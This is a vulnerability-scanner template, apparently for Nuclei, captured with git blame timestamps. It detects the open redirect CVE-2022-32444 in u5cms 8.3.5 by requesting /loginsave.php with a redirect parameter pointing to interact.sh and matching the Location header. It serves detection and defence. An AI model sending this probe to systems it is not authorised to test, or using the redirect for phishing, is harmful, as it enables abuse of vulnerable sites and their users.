2022-06-28 23:14:43 +00:00
|
|
|
id: CVE-2022-32444
|
|
|
|
|
|
|
|
info:
|
2022-06-29 04:56:02 +00:00
|
|
|
name: u5cms v8.3.5 - Open Redirect
|
2022-06-28 23:14:43 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: medium
|
2022-06-30 18:36:09 +00:00
|
|
|
description: |
|
|
|
|
u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest patch or update to a version that has fixed this vulnerability.
|
2022-06-28 23:14:43 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/u5cms/u5cms/issues/50
|
2022-06-30 18:36:09 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-32444
|
2024-05-31 19:23:20 +00:00
|
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
|
|
- https://github.com/Sharpforce/cybersecurity
|
2022-06-28 23:14:43 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2022-32444
|
|
|
|
cwe-id: CWE-601
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.00148
|
|
|
|
epss-percentile: 0.50728
|
2023-09-06 11:59:08 +00:00
|
|
|
cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-15 16:29:17 +00:00
|
|
|
vendor: yuba
|
|
|
|
product: u5cms
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2022,redirect,u5cms,cms,yuba
|
2022-06-28 23:14:43 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-06-28 23:14:43 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2022-06-29 04:56:02 +00:00
|
|
|
- '{{BaseURL}}/loginsave.php?u=http://interact.sh'
|
2022-06-28 23:14:43 +00:00
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
part: header
|
|
|
|
regex:
|
2023-03-01 08:39:14 +00:00
|
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4a0a00473045022050aa89acffff2e04de9307ecb233cceb205a146e9295ca29c59e4c9bd4a095f8022100e290837316fb886f25055704ff222f711fdbe0c0035b28f552b43ae92f7c9d01:922c64590222798bb761d5b6d8e72950
|